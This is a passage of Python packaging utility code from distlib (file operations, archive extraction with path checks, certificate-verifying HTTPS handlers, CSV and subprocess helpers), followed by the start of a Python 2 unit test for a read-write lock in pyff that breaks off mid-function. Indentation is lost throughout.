logger.info('Copying %s to %s', infile, outfile)
if not self.dry_run:
msg = None
if check:
if os.path.islink(outfile):
msg = '%s is a symlink' % outfile
elif os.path.exists(outfile) and not os.path.isfile(outfile):
msg = '%s is a non-regular file' % outfile
if msg:
raise ValueError(msg + ' which would be overwritten')
shutil.copyfile(infile, outfile)
self.record_as_written(outfile)
def copy_stream(self, instream, outfile, encoding=None):
assert not os.path.isdir(outfile)
self.ensure_dir(os.path.dirname(outfile))
logger.info('Copying stream %s to %s', instream, outfile)
if not self.dry_run:
if encoding is None:
outstream = open(outfile, 'wb')
else:
outstream = codecs.open(outfile, 'w', encoding=encoding)
try:
shutil.copyfileobj(instream, outstream)
finally:
outstream.close()
self.record_as_written(outfile)
def write_binary_file(self, path, data):
self.ensure_dir(os.path.dirname(path))
if not self.dry_run:
if os.path.exists(path):
os.remove(path)
with open(path, 'wb') as f:
f.write(data)
self.record_as_written(path)
def write_text_file(self, path, data, encoding):
self.write_binary_file(path, data.encode(encoding))
def set_mode(self, bits, mask, files):
if os.name == 'posix' or (os.name == 'java' and os._name == 'posix'):
# Set the executable bits (owner, group, and world) on
# all the files specified.
for f in files:
if self.dry_run:
logger.info("changing mode of %s", f)
else:
mode = (os.stat(f).st_mode | bits) & mask
logger.info("changing mode of %s to %o", f, mode)
os.chmod(f, mode)
set_executable_mode = lambda s, f: s.set_mode(0o555, 0o7777, f)
def ensure_dir(self, path):
path = os.path.abspath(path)
if path not in self.ensured and not os.path.exists(path):
self.ensured.add(path)
d, f = os.path.split(path)
self.ensure_dir(d)
logger.info('Creating %s' % path)
if not self.dry_run:
os.mkdir(path)
if self.record:
self.dirs_created.add(path)
def byte_compile(self, path, optimize=False, force=False, prefix=None, hashed_invalidation=False):
dpath = cache_from_source(path, not optimize)
logger.info('Byte-compiling %s to %s', path, dpath)
if not self.dry_run:
if force or self.newer(path, dpath):
if not prefix:
diagpath = None
else:
assert path.startswith(prefix)
diagpath = path[len(prefix):]
compile_kwargs = {}
if hashed_invalidation and hasattr(py_compile, 'PycInvalidationMode'):
compile_kwargs['invalidation_mode'] = py_compile.PycInvalidationMode.CHECKED_HASH
py_compile.compile(path, dpath, diagpath, True, **compile_kwargs) # raise error
self.record_as_written(dpath)
return dpath
def ensure_removed(self, path):
if os.path.exists(path):
if os.path.isdir(path) and not os.path.islink(path):
logger.debug('Removing directory tree at %s', path)
if not self.dry_run:
shutil.rmtree(path)
if self.record:
if path in self.dirs_created:
self.dirs_created.remove(path)
else:
if os.path.islink(path):
s = 'link'
else:
s = 'file'
logger.debug('Removing %s %s', s, path)
if not self.dry_run:
os.remove(path)
if self.record:
if path in self.files_written:
self.files_written.remove(path)
def is_writable(self, path):
result = False
while not result:
if os.path.exists(path):
result = os.access(path, os.W_OK)
break
parent = os.path.dirname(path)
if parent == path:
break
path = parent
return result
def commit(self):
"""
Commit recorded changes, turn off recording, return
changes.
"""
assert self.record
result = self.files_written, self.dirs_created
self._init_record()
return result
def rollback(self):
if not self.dry_run:
for f in list(self.files_written):
if os.path.exists(f):
os.remove(f)
# dirs should all be empty now, except perhaps for
# __pycache__ subdirs
# reverse so that subdirs appear before their parents
dirs = sorted(self.dirs_created, reverse=True)
for d in dirs:
flist = os.listdir(d)
if flist:
assert flist == ['__pycache__']
sd = os.path.join(d, flist[0])
os.rmdir(sd)
os.rmdir(d) # should fail if non-empty
self._init_record()
def resolve(module_name, dotted_path):
if module_name in sys.modules:
mod = sys.modules[module_name]
else:
mod = __import__(module_name)
if dotted_path is None:
result = mod
else:
parts = dotted_path.split('.')
result = getattr(mod, parts.pop(0))
for p in parts:
result = getattr(result, p)
return result
class ExportEntry(object):
def __init__(self, name, prefix, suffix, flags):
self.name = name
self.prefix = prefix
self.suffix = suffix
self.flags = flags
@cached_property
def value(self):
return resolve(self.prefix, self.suffix)
def __repr__(self): # pragma: no cover
return '<ExportEntry %s = %s:%s %s>' % (self.name, self.prefix,
self.suffix, self.flags)
def __eq__(self, other):
if not isinstance(other, ExportEntry):
result = False
else:
result = (self.name == other.name and
self.prefix == other.prefix and
self.suffix == other.suffix and
self.flags == other.flags)
return result
__hash__ = object.__hash__
ENTRY_RE = re.compile(r'''(?P<name>(\w|[-.+])+)
\s*=\s*(?P<callable>(\w+)([:\.]\w+)*)
\s*(\[\s*(?P<flags>[\w-]+(=\w+)?(,\s*\w+(=\w+)?)*)\s*\])?
''', re.VERBOSE)
def get_export_entry(specification):
m = ENTRY_RE.search(specification)
if not m:
result = None
if '[' in specification or ']' in specification:
raise DistlibException("Invalid specification "
"'%s'" % specification)
else:
d = m.groupdict()
name = d['name']
path = d['callable']
colons = path.count(':')
if colons == 0:
prefix, suffix = path, None
else:
if colons != 1:
raise DistlibException("Invalid specification "
"'%s'" % specification)
prefix, suffix = path.split(':')
flags = d['flags']
if flags is None:
if '[' in specification or ']' in specification:
raise DistlibException("Invalid specification "
"'%s'" % specification)
flags = []
else:
flags = [f.strip() for f in flags.split(',')]
result = ExportEntry(name, prefix, suffix, flags)
return result
def get_cache_base(suffix=None):
"""
Return the default base location for distlib caches. If the directory does
not exist, it is created. Use the suffix provided for the base directory,
and default to '.distlib' if it isn't provided.
On Windows, if LOCALAPPDATA is defined in the environment, then it is
assumed to be a directory, and will be the parent directory of the result.
On POSIX, and on Windows if LOCALAPPDATA is not defined, the user's home
directory - using os.expanduser('~') - will be the parent directory of
the result.
The result is just the directory '.distlib' in the parent directory as
determined above, or with the name specified with ``suffix``.
"""
if suffix is None:
suffix = '.distlib'
if os.name == 'nt' and 'LOCALAPPDATA' in os.environ:
result = os.path.expandvars('$localappdata')
else:
# Assume posix, or old Windows
result = os.path.expanduser('~')
# we use 'isdir' instead of 'exists', because we want to
# fail if there's a file with that name
if os.path.isdir(result):
usable = os.access(result, os.W_OK)
if not usable:
logger.warning('Directory exists but is not writable: %s', result)
else:
try:
os.makedirs(result)
usable = True
except OSError:
logger.warning('Unable to create %s', result, exc_info=True)
usable = False
if not usable:
result = tempfile.mkdtemp()
logger.warning('Default location unusable, using %s', result)
return os.path.join(result, suffix)
def path_to_cache_dir(path):
"""
Convert an absolute path to a directory name for use in a cache.
The algorithm used is:
#. On Windows, any ``':'`` in the drive is replaced with ``'---'``.
#. Any occurrence of ``os.sep`` is replaced with ``'--'``.
#. ``'.cache'`` is appended.
"""
d, p = os.path.splitdrive(os.path.abspath(path))
if d:
d = d.replace(':', '---')
p = p.replace(os.sep, '--')
return d + p + '.cache'
def ensure_slash(s):
if not s.endswith('/'):
return s + '/'
return s
def parse_credentials(netloc):
username = password = None
if '@' in netloc:
prefix, netloc = netloc.rsplit('@', 1)
if ':' not in prefix:
username = prefix
else:
username, password = prefix.split(':', 1)
if username:
username = unquote(username)
if password:
password = unquote(password)
return username, password, netloc
def get_process_umask():
result = os.umask(0o22)
os.umask(result)
return result
def is_string_sequence(seq):
result = True
i = None
for i, s in enumerate(seq):
if not isinstance(s, string_types):
result = False
break
assert i is not None
return result
PROJECT_NAME_AND_VERSION = re.compile('([a-z0-9_]+([.-][a-z_][a-z0-9_]*)*)-'
'([a-z0-9_.+-]+)', re.I)
PYTHON_VERSION = re.compile(r'-py(\d\.?\d?)')
def split_filename(filename, project_name=None):
"""
Extract name, version, python version from a filename (no extension)
Return name, version, pyver or None
"""
result = None
pyver = None
filename = unquote(filename).replace(' ', '-')
m = PYTHON_VERSION.search(filename)
if m:
pyver = m.group(1)
filename = filename[:m.start()]
if project_name and len(filename) > len(project_name) + 1:
m = re.match(re.escape(project_name) + r'\b', filename)
if m:
n = m.end()
result = filename[:n], filename[n + 1:], pyver
if result is None:
m = PROJECT_NAME_AND_VERSION.match(filename)
if m:
result = m.group(1), m.group(3), pyver
return result
# Allow spaces in name because of legacy dists like "Twisted Core"
NAME_VERSION_RE = re.compile(r'(?P<name>[\w .-]+)\s*'
r'\(\s*(?P<ver>[^\s)]+)\)$')
def parse_name_and_version(p):
"""
A utility method used to get name and version from a string.
From e.g. a Provides-Dist value.
:param p: A value in a form 'foo (1.0)'
:return: The name and version as a tuple.
"""
m = NAME_VERSION_RE.match(p)
if not m:
raise DistlibException('Ill-formed name/version string: \'%s\'' % p)
d = m.groupdict()
return d['name'].strip().lower(), d['ver']
def get_extras(requested, available):
result = set()
requested = set(requested or [])
available = set(available or [])
if '*' in requested:
requested.remove('*')
result |= available
for r in requested:
if r == '-':
result.add(r)
elif r.startswith('-'):
unwanted = r[1:]
if unwanted not in available:
logger.warning('undeclared extra: %s' % unwanted)
if unwanted in result:
result.remove(unwanted)
else:
if r not in available:
logger.warning('undeclared extra: %s' % r)
result.add(r)
return result
#
# Extended metadata functionality
#
def _get_external_data(url):
result = {}
try:
# urlopen might fail if it runs into redirections,
# because of Python issue #13696. Fixed in locators
# using a custom redirect handler.
resp = urlopen(url)
headers = resp.info()
ct = headers.get('Content-Type')
if not ct.startswith('application/json'):
logger.debug('Unexpected response for JSON request: %s', ct)
else:
reader = codecs.getreader('utf-8')(resp)
#data = reader.read().decode('utf-8')
#result = json.loads(data)
result = json.load(reader)
except Exception as e:
logger.exception('Failed to get external data for %s: %s', url, e)
return result
_external_data_base_url = 'https://www.red-dove.com/pypi/projects/'
def get_project_data(name):
url = '%s/%s/project.json' % (name[0].upper(), name)
url = urljoin(_external_data_base_url, url)
result = _get_external_data(url)
return result
def get_package_data(name, version):
url = '%s/%s/package-%s.json' % (name[0].upper(), name, version)
url = urljoin(_external_data_base_url, url)
return _get_external_data(url)
class Cache(object):
"""
A class implementing a cache for resources that need to live in the file system
e.g. shared libraries. This class was moved from resources to here because it
could be used by other modules, e.g. the wheel module.
"""
def __init__(self, base):
"""
Initialise an instance.
:param base: The base directory where the cache should be located.
"""
# we use 'isdir' instead of 'exists', because we want to
# fail if there's a file with that name
if not os.path.isdir(base): # pragma: no cover
os.makedirs(base)
if (os.stat(base).st_mode & 0o77) != 0:
logger.warning('Directory \'%s\' is not private', base)
self.base = os.path.abspath(os.path.normpath(base))
def prefix_to_dir(self, prefix):
"""
Converts a resource prefix to a directory name in the cache.
"""
return path_to_cache_dir(prefix)
def clear(self):
"""
Clear the cache.
"""
not_removed = []
for fn in os.listdir(self.base):
fn = os.path.join(self.base, fn)
try:
if os.path.islink(fn) or os.path.isfile(fn):
os.remove(fn)
elif os.path.isdir(fn):
shutil.rmtree(fn)
except Exception:
not_removed.append(fn)
return not_removed
class EventMixin(object):
"""
A very simple publish/subscribe system.
"""
def __init__(self):
self._subscribers = {}
def add(self, event, subscriber, append=True):
"""
Add a subscriber for an event.
:param event: The name of an event.
:param subscriber: The subscriber to be added (and called when the
event is published).
:param append: Whether to append or prepend the subscriber to an
existing subscriber list for the event.
"""
subs = self._subscribers
if event not in subs:
subs[event] = deque([subscriber])
else:
sq = subs[event]
if append:
sq.append(subscriber)
else:
sq.appendleft(subscriber)
def remove(self, event, subscriber):
"""
Remove a subscriber for an event.
:param event: The name of an event.
:param subscriber: The subscriber to be removed.
"""
subs = self._subscribers
if event not in subs:
raise ValueError('No subscribers: %r' % event)
subs[event].remove(subscriber)
def get_subscribers(self, event):
"""
Return an iterator for the subscribers for an event.
:param event: The event to return subscribers for.
"""
return iter(self._subscribers.get(event, ()))
def publish(self, event, *args, **kwargs):
"""
Publish a event and return a list of values returned by its
subscribers.
:param event: The event to publish.
:param args: The positional arguments to pass to the event's
subscribers.
:param kwargs: The keyword arguments to pass to the event's
subscribers.
"""
result = []
for subscriber in self.get_subscribers(event):
try:
value = subscriber(event, *args, **kwargs)
except Exception:
logger.exception('Exception during event publication')
value = None
result.append(value)
logger.debug('publish %s: args = %s, kwargs = %s, result = %s',
event, args, kwargs, result)
return result
#
# Simple sequencing
#
class Sequencer(object):
def __init__(self):
self._preds = {}
self._succs = {}
self._nodes = set() # nodes with no preds/succs
def add_node(self, node):
self._nodes.add(node)
def remove_node(self, node, edges=False):
if node in self._nodes:
self._nodes.remove(node)
if edges:
for p in set(self._preds.get(node, ())):
self.remove(p, node)
for s in set(self._succs.get(node, ())):
self.remove(node, s)
# Remove empties
for k, v in list(self._preds.items()):
if not v:
del self._preds[k]
for k, v in list(self._succs.items()):
if not v:
del self._succs[k]
def add(self, pred, succ):
assert pred != succ
self._preds.setdefault(succ, set()).add(pred)
self._succs.setdefault(pred, set()).add(succ)
def remove(self, pred, succ):
assert pred != succ
try:
preds = self._preds[succ]
succs = self._succs[pred]
except KeyError: # pragma: no cover
raise ValueError('%r not a successor of anything' % succ)
try:
preds.remove(pred)
succs.remove(succ)
except KeyError: # pragma: no cover
raise ValueError('%r not a successor of %r' % (succ, pred))
def is_step(self, step):
return (step in self._preds or step in self._succs or
step in self._nodes)
def get_steps(self, final):
if not self.is_step(final):
raise ValueError('Unknown: %r' % final)
result = []
todo = []
seen = set()
todo.append(final)
while todo:
step = todo.pop(0)
if step in seen:
# if a step was already seen,
# move it to the end (so it will appear earlier
# when reversed on return) ... but not for the
# final step, as that would be confusing for
# users
if step != final:
result.remove(step)
result.append(step)
else:
seen.add(step)
result.append(step)
preds = self._preds.get(step, ())
todo.extend(preds)
return reversed(result)
@property
def strong_connections(self):
#http://en.wikipedia.org/wiki/Tarjan%27s_strongly_connected_components_algorithm
index_counter = [0]
stack = []
lowlinks = {}
index = {}
result = []
graph = self._succs
def strongconnect(node):
# set the depth index for this node to the smallest unused index
index[node] = index_counter[0]
lowlinks[node] = index_counter[0]
index_counter[0] += 1
stack.append(node)
# Consider successors
try:
successors = graph[node]
except Exception:
successors = []
for successor in successors:
if successor not in lowlinks:
# Successor has not yet been visited
strongconnect(successor)
lowlinks[node] = min(lowlinks[node],lowlinks[successor])
elif successor in stack:
# the successor is in the stack and hence in the current
# strongly connected component (SCC)
lowlinks[node] = min(lowlinks[node],index[successor])
# If `node` is a root node, pop the stack and generate an SCC
if lowlinks[node] == index[node]:
connected_component = []
while True:
successor = stack.pop()
connected_component.append(successor)
if successor == node: break
component = tuple(connected_component)
# storing the result
result.append(component)
for node in graph:
if node not in lowlinks:
strongconnect(node)
return result
@property
def dot(self):
result = ['digraph G {']
for succ in self._preds:
preds = self._preds[succ]
for pred in preds:
result.append(' %s -> %s;' % (pred, succ))
for node in self._nodes:
result.append(' %s;' % node)
result.append('}')
return '\n'.join(result)
#
# Unarchiving functionality for zip, tar, tgz, tbz, whl
#
ARCHIVE_EXTENSIONS = ('.tar.gz', '.tar.bz2', '.tar', '.zip',
'.tgz', '.tbz', '.whl')
def unarchive(archive_filename, dest_dir, format=None, check=True):
def check_path(path):
if not isinstance(path, text_type):
path = path.decode('utf-8')
p = os.path.abspath(os.path.join(dest_dir, path))
if not p.startswith(dest_dir) or p[plen] != os.sep:
raise ValueError('path outside destination: %r' % p)
dest_dir = os.path.abspath(dest_dir)
plen = len(dest_dir)
archive = None
if format is None:
if archive_filename.endswith(('.zip', '.whl')):
format = 'zip'
elif archive_filename.endswith(('.tar.gz', '.tgz')):
format = 'tgz'
mode = 'r:gz'
elif archive_filename.endswith(('.tar.bz2', '.tbz')):
format = 'tbz'
mode = 'r:bz2'
elif archive_filename.endswith('.tar'):
format = 'tar'
mode = 'r'
else: # pragma: no cover
raise ValueError('Unknown format for %r' % archive_filename)
try:
if format == 'zip':
archive = ZipFile(archive_filename, 'r')
if check:
names = archive.namelist()
for name in names:
check_path(name)
else:
archive = tarfile.open(archive_filename, mode)
if check:
names = archive.getnames()
for name in names:
check_path(name)
if format != 'zip' and sys.version_info[0] < 3:
# See Python issue 17153. If the dest path contains Unicode,
# tarfile extraction fails on Python 2.x if a member path name
# contains non-ASCII characters - it leads to an implicit
# bytes -> unicode conversion using ASCII to decode.
for tarinfo in archive.getmembers():
if not isinstance(tarinfo.name, text_type):
tarinfo.name = tarinfo.name.decode('utf-8')
archive.extractall(dest_dir)
finally:
if archive:
archive.close()
def zip_dir(directory):
"""zip a directory tree into a BytesIO object"""
result = io.BytesIO()
dlen = len(directory)
with ZipFile(result, "w") as zf:
for root, dirs, files in os.walk(directory):
for name in files:
full = os.path.join(root, name)
rel = root[dlen:]
dest = os.path.join(rel, name)
zf.write(full, dest)
return result
#
# Simple progress bar
#
UNITS = ('', 'K', 'M', 'G','T','P')
class Progress(object):
unknown = 'UNKNOWN'
def __init__(self, minval=0, maxval=100):
assert maxval is None or maxval >= minval
self.min = self.cur = minval
self.max = maxval
self.started = None
self.elapsed = 0
self.done = False
def update(self, curval):
assert self.min <= curval
assert self.max is None or curval <= self.max
self.cur = curval
now = time.time()
if self.started is None:
self.started = now
else:
self.elapsed = now - self.started
def increment(self, incr):
assert incr >= 0
self.update(self.cur + incr)
def start(self):
self.update(self.min)
return self
def stop(self):
if self.max is not None:
self.update(self.max)
self.done = True
@property
def maximum(self):
return self.unknown if self.max is None else self.max
@property
def percentage(self):
if self.done:
result = '100 %'
elif self.max is None:
result = ' ?? %'
else:
v = 100.0 * (self.cur - self.min) / (self.max - self.min)
result = '%3d %%' % v
return result
def format_duration(self, duration):
if (duration <= 0) and self.max is None or self.cur == self.min:
result = '??:??:??'
#elif duration < 1:
# result = '--:--:--'
else:
result = time.strftime('%H:%M:%S', time.gmtime(duration))
return result
@property
def ETA(self):
if self.done:
prefix = 'Done'
t = self.elapsed
#import pdb; pdb.set_trace()
else:
prefix = 'ETA '
if self.max is None:
t = -1
elif self.elapsed == 0 or (self.cur == self.min):
t = 0
else:
#import pdb; pdb.set_trace()
t = float(self.max - self.min)
t /= self.cur - self.min
t = (t - 1) * self.elapsed
return '%s: %s' % (prefix, self.format_duration(t))
@property
def speed(self):
if self.elapsed == 0:
result = 0.0
else:
result = (self.cur - self.min) / self.elapsed
for unit in UNITS:
if result < 1000:
break
result /= 1000.0
return '%d %sB/s' % (result, unit)
#
# Glob functionality
#
RICH_GLOB = re.compile(r'\{([^}]*)\}')
_CHECK_RECURSIVE_GLOB = re.compile(r'[^/\\,{]\*\*|\*\*[^/\\,}]')
_CHECK_MISMATCH_SET = re.compile(r'^[^{]*\}|\{[^}]*$')
def iglob(path_glob):
"""Extended globbing function that supports ** and {opt1,opt2,opt3}."""
if _CHECK_RECURSIVE_GLOB.search(path_glob):
msg = """invalid glob %r: recursive glob "**" must be used alone"""
raise ValueError(msg % path_glob)
if _CHECK_MISMATCH_SET.search(path_glob):
msg = """invalid glob %r: mismatching set marker '{' or '}'"""
raise ValueError(msg % path_glob)
return _iglob(path_glob)
def _iglob(path_glob):
rich_path_glob = RICH_GLOB.split(path_glob, 1)
if len(rich_path_glob) > 1:
assert len(rich_path_glob) == 3, rich_path_glob
prefix, set, suffix = rich_path_glob
for item in set.split(','):
for path in _iglob(''.join((prefix, item, suffix))):
yield path
else:
if '**' not in path_glob:
for item in std_iglob(path_glob):
yield item
else:
prefix, radical = path_glob.split('**', 1)
if prefix == '':
prefix = '.'
if radical == '':
radical = '*'
else:
# we support both
radical = radical.lstrip('/')
radical = radical.lstrip('\\')
for path, dir, files in os.walk(prefix):
path = os.path.normpath(path)
for fn in _iglob(os.path.join(path, radical)):
yield fn
if ssl:
from .compat import (HTTPSHandler as BaseHTTPSHandler, match_hostname,
CertificateError)
#
# HTTPSConnection which verifies certificates/matches domains
#
class HTTPSConnection(httplib.HTTPSConnection):
ca_certs = None # set this to the path to the certs file (.pem)
check_domain = True # only used if ca_certs is not None
# noinspection PyPropertyAccess
def connect(self):
sock = socket.create_connection((self.host, self.port), self.timeout)
if getattr(self, '_tunnel_host', False):
self.sock = sock
self._tunnel()
if not hasattr(ssl, 'SSLContext'):
# For 2.x
if self.ca_certs:
cert_reqs = ssl.CERT_REQUIRED
else:
cert_reqs = ssl.CERT_NONE
self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file,
cert_reqs=cert_reqs,
ssl_version=ssl.PROTOCOL_SSLv23,
ca_certs=self.ca_certs)
else: # pragma: no cover
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
if hasattr(ssl, 'OP_NO_SSLv2'):
context.options |= ssl.OP_NO_SSLv2
if self.cert_file:
context.load_cert_chain(self.cert_file, self.key_file)
kwargs = {}
if self.ca_certs:
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(cafile=self.ca_certs)
if getattr(ssl, 'HAS_SNI', False):
kwargs['server_hostname'] = self.host
self.sock = context.wrap_socket(sock, **kwargs)
if self.ca_certs and self.check_domain:
try:
match_hostname(self.sock.getpeercert(), self.host)
logger.debug('Host verified: %s', self.host)
except CertificateError: # pragma: no cover
self.sock.shutdown(socket.SHUT_RDWR)
self.sock.close()
raise
class HTTPSHandler(BaseHTTPSHandler):
def __init__(self, ca_certs, check_domain=True):
BaseHTTPSHandler.__init__(self)
self.ca_certs = ca_certs
self.check_domain = check_domain
def _conn_maker(self, *args, **kwargs):
"""
This is called to create a connection instance. Normally you'd
pass a connection class to do_open, but it doesn't actually check for
a class, and just expects a callable. As long as we behave just as a
constructor would have, we should be OK. If it ever changes so that
we *must* pass a class, we'll create an UnsafeHTTPSConnection class
which just sets check_domain to False in the class definition, and
choose which one to pass to do_open.
"""
result = HTTPSConnection(*args, **kwargs)
if self.ca_certs:
result.ca_certs = self.ca_certs
result.check_domain = self.check_domain
return result
def https_open(self, req):
try:
return self.do_open(self._conn_maker, req)
except URLError as e:
if 'certificate verify failed' in str(e.reason):
raise CertificateError('Unable to verify server certificate '
'for %s' % req.host)
else:
raise
#
# To prevent against mixing HTTP traffic with HTTPS (examples: A Man-In-The-
# Middle proxy using HTTP listens on port 443, or an index mistakenly serves
# HTML containing a http://xyz link when it should be https://xyz),
# you can use the following handler class, which does not allow HTTP traffic.
#
# It works by inheriting from HTTPHandler - so build_opener won't add a
# handler for HTTP itself.
#
class HTTPSOnlyHandler(HTTPSHandler, HTTPHandler):
def http_open(self, req):
raise URLError('Unexpected HTTP request on what should be a secure '
'connection: %s' % req)
#
# XML-RPC with timeouts
#
_ver_info = sys.version_info[:2]
if _ver_info == (2, 6):
class HTTP(httplib.HTTP):
def __init__(self, host='', port=None, **kwargs):
if port == 0: # 0 means use port 0, not the default port
port = None
self._setup(self._connection_class(host, port, **kwargs))
if ssl:
class HTTPS(httplib.HTTPS):
def __init__(self, host='', port=None, **kwargs):
if port == 0: # 0 means use port 0, not the default port
port = None
self._setup(self._connection_class(host, port, **kwargs))
class Transport(xmlrpclib.Transport):
def __init__(self, timeout, use_datetime=0):
self.timeout = timeout
xmlrpclib.Transport.__init__(self, use_datetime)
def make_connection(self, host):
h, eh, x509 = self.get_host_info(host)
if _ver_info == (2, 6):
result = HTTP(h, timeout=self.timeout)
else:
if not self._connection or host != self._connection[0]:
self._extra_headers = eh
self._connection = host, httplib.HTTPConnection(h)
result = self._connection[1]
return result
if ssl:
class SafeTransport(xmlrpclib.SafeTransport):
def __init__(self, timeout, use_datetime=0):
self.timeout = timeout
xmlrpclib.SafeTransport.__init__(self, use_datetime)
def make_connection(self, host):
h, eh, kwargs = self.get_host_info(host)
if not kwargs:
kwargs = {}
kwargs['timeout'] = self.timeout
if _ver_info == (2, 6):
result = HTTPS(host, None, **kwargs)
else:
if not self._connection or host != self._connection[0]:
self._extra_headers = eh
self._connection = host, httplib.HTTPSConnection(h, None,
**kwargs)
result = self._connection[1]
return result
class ServerProxy(xmlrpclib.ServerProxy):
def __init__(self, uri, **kwargs):
self.timeout = timeout = kwargs.pop('timeout', None)
# The above classes only come into play if a timeout
# is specified
if timeout is not None:
scheme, _ = splittype(uri)
use_datetime = kwargs.get('use_datetime', 0)
if scheme == 'https':
tcls = SafeTransport
else:
tcls = Transport
kwargs['transport'] = t = tcls(timeout, use_datetime=use_datetime)
self.transport = t
xmlrpclib.ServerProxy.__init__(self, uri, **kwargs)
#
# CSV functionality. This is provided because on 2.x, the csv module can't
# handle Unicode. However, we need to deal with Unicode in e.g. RECORD files.
#
def _csv_open(fn, mode, **kwargs):
if sys.version_info[0] < 3:
mode += 'b'
else:
kwargs['newline'] = ''
# Python 3 determines encoding from locale. Force 'utf-8'
# file encoding to match other forced utf-8 encoding
kwargs['encoding'] = 'utf-8'
return open(fn, mode, **kwargs)
class CSVBase(object):
defaults = {
'delimiter': str(','), # The strs are used because we need native
'quotechar': str('"'), # str in the csv API (2.x won't take
'lineterminator': str('\n') # Unicode)
}
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.stream.close()
class CSVReader(CSVBase):
def __init__(self, **kwargs):
if 'stream' in kwargs:
stream = kwargs['stream']
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getreader('utf-8')(stream)
self.stream = stream
else:
self.stream = _csv_open(kwargs['path'], 'r')
self.reader = csv.reader(self.stream, **self.defaults)
def __iter__(self):
return self
def next(self):
result = next(self.reader)
if sys.version_info[0] < 3:
for i, item in enumerate(result):
if not isinstance(item, text_type):
result[i] = item.decode('utf-8')
return result
__next__ = next
class CSVWriter(CSVBase):
def __init__(self, fn, **kwargs):
self.stream = _csv_open(fn, 'w')
self.writer = csv.writer(self.stream, **self.defaults)
def writerow(self, row):
if sys.version_info[0] < 3:
r = []
for item in row:
if isinstance(item, text_type):
item = item.encode('utf-8')
r.append(item)
row = r
self.writer.writerow(row)
#
# Configurator functionality
#
class Configurator(BaseConfigurator):
value_converters = dict(BaseConfigurator.value_converters)
value_converters['inc'] = 'inc_convert'
def __init__(self, config, base=None):
super(Configurator, self).__init__(config)
self.base = base or os.getcwd()
def configure_custom(self, config):
def convert(o):
if isinstance(o, (list, tuple)):
result = type(o)([convert(i) for i in o])
elif isinstance(o, dict):
if '()' in o:
result = self.configure_custom(o)
else:
result = {}
for k in o:
result[k] = convert(o[k])
else:
result = self.convert(o)
return result
c = config.pop('()')
if not callable(c):
c = self.resolve(c)
props = config.pop('.', None)
# Check for valid identifiers
args = config.pop('[]', ())
if args:
args = tuple([convert(o) for o in args])
items = [(k, convert(config[k])) for k in config if valid_ident(k)]
kwargs = dict(items)
result = c(*args, **kwargs)
if props:
for n, v in props.items():
setattr(result, n, convert(v))
return result
def __getitem__(self, key):
result = self.config[key]
if isinstance(result, dict) and '()' in result:
self.config[key] = result = self.configure_custom(result)
return result
def inc_convert(self, value):
"""Default converter for the inc:// protocol."""
if not os.path.isabs(value):
value = os.path.join(self.base, value)
with codecs.open(value, 'r', encoding='utf-8') as f:
result = json.load(f)
return result
class SubprocessMixin(object):
"""
Mixin for running subprocesses and capturing their output
"""
def __init__(self, verbose=False, progress=None):
self.verbose = verbose
self.progress = progress
def reader(self, stream, context):
"""
Read lines from a subprocess' output stream and either pass to a progress
callable (if specified) or write progress information to sys.stderr.
"""
progress = self.progress
verbose = self.verbose
while True:
s = stream.readline()
if not s:
break
if progress is not None:
progress(s, context)
else:
if not verbose:
sys.stderr.write('.')
else:
sys.stderr.write(s.decode('utf-8'))
sys.stderr.flush()
stream.close()
def run_command(self, cmd, **kwargs):
p = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, **kwargs)
t1 = threading.Thread(target=self.reader, args=(p.stdout, 'stdout'))
t1.start()
t2 = threading.Thread(target=self.reader, args=(p.stderr, 'stderr'))
t2.start()
p.wait()
t1.join()
t2.join()
if self.progress is not None:
self.progress('done.', 'main')
elif self.verbose:
sys.stderr.write('done.\n')
return p
def normalize_name(name):
"""Normalize a python package name a la PEP 503"""
# https://www.python.org/dev/peps/pep-0503/#normalized-names
return re.sub('[-_.]+', '-', name).lower()
|
test_rwlock.py | from threading import Thread, current_thread
from time import sleep
from unittest import TestCase
from pyff.locks import ReadWriteLock
class TestReadWriteLock(TestCase):
def setUp(self):
self.lock = ReadWriteLock()
self.readers = 0
self.writer_active = False
self.exceptions = dict()
def reset(self):
self.exceptions = dict()
def test_error_on_release_unheld_lock(self):
try:
self.lock.release()
assert False
except ValueError:
pass
def timeout_writer(self, timeout=1):
try:
for tries in range(1, 10):
self.lock.acquireRead(timeout=timeout, blocking=False) # get a read
for tries in range(1, 10):
self.lock.acquireWrite(timeout=timeout, blocking=False) # upgrade to write
self.lock.acquireWrite(blocking=True) # get it twice...
print "thread (writer): %s starting" % current_thread().name
self.writer_active = True
sleep(1)
except Exception, ex:
self.exceptions[current_thread().name] = ex
finally:
try:
self.lock.release()
except ValueError: # ignore double release error
pass
self.writer_active = False
print "thread: %s exiting" % current_thread().name
def timeout_reader(self, to_wait_for, timeout=1):
try:
self.lock.acquireRead(timeout=timeout)
assert(not self.writer_active)
print "thread (reader): %s starting" % current_thread().name
self.readers += 1
while to_wait_for - self.readers > 0:
assert(not self.writer_active)
print "waiting for %d more readers" % (to_wait_for - self.readers)
sleep(0.1)
except Exception, ex:
self.exceptions[current_thread().name] = ex
finally:
try:
self.lock.release()
except ValueError: # ignore double release error
pass
print "thread (reader): %s exiting" % current_thread().name
def writer(self):
try:
with self.lock.writelock:
print "thread (writer): %s starting" % current_thread().name
self.writer_active = True
self.lock.acquireRead(timeout=0.1) # make sure we can get a readlock as a writer
sleep(1)
self.writer_active = False
print "thread: %s exiting" % current_thread().name
except Exception, ex:
self.exceptions[current_thread().name] = ex
finally:
try:
self.lock.release()
except ValueError: # ignore double release error
pass
def reader(self, to_wait_for):
try:
with self.lock.readlock:
assert(not self.writer_active)
print "thread (reader): %s starting" % current_thread().name
self.readers += 1
while to_wait_for - self.readers > 0:
assert(not self.writer_active)
print "waiting for %d more readers" % (to_wait_for - self.readers)
sleep(0.1)
print "thread (reader): %s exiting" % current_thread().name
except Exception, ex:
self.exceptions[current_thread().name] = ex
def _raise(self, t):
assert (not t.isAlive())
if t.name in self.exceptions:
raise self.exceptions[t.name]
def _rww(self, timeout=1, to_wait_for=2):
try:
self.lock.acquireRead(timeout=timeout)
self.readers += 1
while to_wait_for - self.readers > 0:
pass
self.lock.acquireWrite(timeout=timeout)
self.lock.acquireWrite(timeout=timeout)
except Exception, ex:
